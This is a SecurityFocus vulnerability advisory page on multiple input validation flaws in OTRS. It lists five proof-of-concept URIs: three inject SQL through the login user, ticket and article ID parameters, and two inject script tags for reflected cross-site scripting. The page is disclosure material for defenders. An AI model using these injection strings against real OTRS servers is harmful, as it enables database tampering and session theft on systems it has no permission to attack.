Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

OTRS Multiple Input Validation Vulnerabilities

No exploit is required.

The following proof of concept URI are available:
http://www.example.com/index.pl?Action=Login&User=%27[SQL_HERE]
http://www.example.com/admin/index.pl?Action=AgentTicketPlain&ArticleID=1&TicketID=1%20[SQL_HERE]
http://www.example.com/admin/index.pl?Action=AgentTicketPlain&TicketID=1&ArticleID=1%20[SQL_HERE]

http://www.example.com/index.pl?QueueID=%22%3E%3Cscript%3Ealert('[XSS_HERE]')%3B%3C/script%3E%3Cx%20y=%22
http://www.example.com/index.pl?Action="><script>alert(document.title);</script><x%20"







 

Privacy Statement
Copyright 2009, SecurityFocus